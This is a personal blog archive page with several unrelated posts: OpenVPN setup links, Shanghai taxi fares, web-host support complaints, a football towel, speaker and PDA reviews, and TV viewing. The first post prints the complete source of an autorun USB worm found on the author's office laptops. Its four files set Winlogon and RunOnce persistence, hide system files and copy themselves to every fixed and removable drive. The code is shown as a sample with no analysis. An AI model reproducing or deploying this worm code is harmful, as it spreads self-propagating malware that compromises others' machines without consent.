HitHat - Billy Qiu's Blog

Recently all the laptops in our office got attacked by some "autorun" worm.

Here is the source code for these files.  The files can be found in %systemroot%\system32\ folder and all infected root drives.

1. Autorun.inf

[autorun]
shell\open=打开(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\autorun.vbs

2. Autorun.bat

@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit

‘;免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
‘;免杀

:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end

3. Autorun.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002

4. Autorun.vbs

on error resume next
Set WshShell =CreateObject("WScript.Shell")

if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if

OpenVPN is the free open source project of VPN solutions.  I installed the GUI version on my windows 2003 server a long time ago.  However, I tried hard  to configure it that time by following some web tutorial but couldn’t get it to work properly.  Today I found two posts in Chinese which help me to finally get it to work.

Links below:

Windows 下使用 CA 验证的 OpenVPN Server 的配置方法 (by ELM)

OpenVPN之以太网桥接 (by 温占考 from OpenVPN.net)

courtesy of  "decade_null"

Shanghai taxi fares rise since May 11, the base fee which covers the first three kilometers increases to 11 yuan from 10 yuan during the day before (11pm), and the price after 11pm jumped to 14 yuan from current 13 yuan.

Besides this, the price for each additional kilometers also rised slightly from 2 yuan to 2.1 yuan.

Reported by Shanghai Daily

Get Billy’s invitation to try WP here. It’s unbelievable powerful and versatile, much stronger than MT2.6 which I currently use.

After several times of rolling back to history data and two days totally server outage. Wangjianshuo a famous blogger in Shanghai had been dealing supporting cases with his hosting service provider lunarpages.com which had a very very poor support service. He said the support ticket he opened had no response for more than 56 hours. (Hard to imagine for me, who are going to do business with this vendor). Well, he finally found the quickest way to contact them was via telephone call. Although he’d been asked to stay on hold for 7 mins, he said that was much better than the previous vendor ipowerweb which had told him to wait for 27 mins.

Well, I also think that most of the call centers in states do have a very poor service. I hardly had the patience to wait for about 20 mins to talk to a real person. This happens so frequently, thus interestingly this was regarded as normal and was widely accepted by most Americans.

Speaking of the poor telephone support services, there are some exceptions however I would like to mention here. One example is the Citi Bank who did a series of TV commercials advertising its new call center services, saying that its customers can directly talk to a real person when making a phone call for support.  Since I’m not its card user, I’d never tested it.  The other example is Godaddy, (It seems I’ve been mention godaddy frequently recently, I promise I’m not advertising here). They actively make phone calls to their customers asking whether they had any questions about using their services when the customers had done any purchases recently. As for myself, I got at least three phone calls from them, however due to timezone difference, I didn’t pick up any of them during my midnight.  However they kept trying for 3 midnights continuously. That was amazing for me.  And some Americans even couldn’t help shouting out excitedly about that,  “Wow, Godaddy called me, which was cool!” (I heard similar expressions in both TWIT and Diggnation podcasts)  hehe

In the office of Rodale an eyecatching yellow towel titled big “Terrible Towel” hung on Devon’s cubicle aroused my interest.

I searched web for its story. It is a gimmick created by Myron Cope, a broadcaster for the Pittsburgh Steelers (an American football team). Needing a way to excite the fans during a 1975 playoff football game against the Baltimore Colts, Cope urged fans to take yellow dish towels to the game and wave them throughout. The stands were filled with yellow towels that day, and the Steelers always seemed to complete terrific plays when the towels were waving. The Steelers won that game 28-10.

So Devon must be a super fan of Pittsburgh Steelers.

Check out Answers.com for more info

Today I finally received the JBL duet speakers shipped from Amazon. They look really cute, I like this special shape. They can perfectly match the Apple Ipod design. However, I no longer own an ipod for years now, since the one got burned during unplugging the USB port. You should also be very careful if you have an apple product, they are very nice but could be fragile!
Anyway, what I want to say here is that the JBL duet sound quality is amazing. Although it’s small if not tiny, but the sound is crystal clear. Signal-Noise ratio is very high. I mean by real feeling. Bass is much better than many other powered speakers of that size, Vocal also sounded clean, and tend to feel “real”. I mean acoustic not too “digital”, you know.
I tried playing some mp3 using creative MuVo, guitar intro sounded pretty cool. It was like someone playing in my bedroom. Nice that I made up my mind to buy this one, it turned out to be another good bargain, haha!

Watched Lost yesterday from ABC

Since I came to the US, it was my first time watching my favorite (and only) TV show LOST the 2nd season on ABC Wed 9/8c.
It was because of two things. One, Lost stopped broadcasting on late Nov for six weeks. Actually, resumed since last week, 11-Jan. Well, unfortunately I missed it, because the 2nd reason, that we don’t have a TV in our former apartment. I moved to this new apartment to share it with my colleague Pankaj. Nice he finally got both the TV and a working cable.
However, it was also very possible that I could have missed it. Since, cable signal was dead from Tue afternoon, but recovered like a miracle the next day in the evening. And I’m glad that I find the right channel for the show. We don’t have a dedicated ABC channel here, it was showed on the #62 channel, which usually was a very dull channel called RAI Internal.

Wow, I’m doing pocket blogging now

Installed the Pocket Blog program which is free to download from Pocket Blog website. I support my MT based blog system very well, I can even create entries offline and get them synced when I get it online. Very practical function, even better than the MT admin console.
I also noticed another program called Pocket Sharp MT, I’ll try it as well and update this entry later.

Bought the DELL X51v from DELL.com for a total cost of $388. have been using it for a week now. The VGA screen really rocks. However Windows Mobile 5 OS sucks. And Mediaplayer tend to hang the whole system up. Soft resets became a frequent thing to do to get things fixed.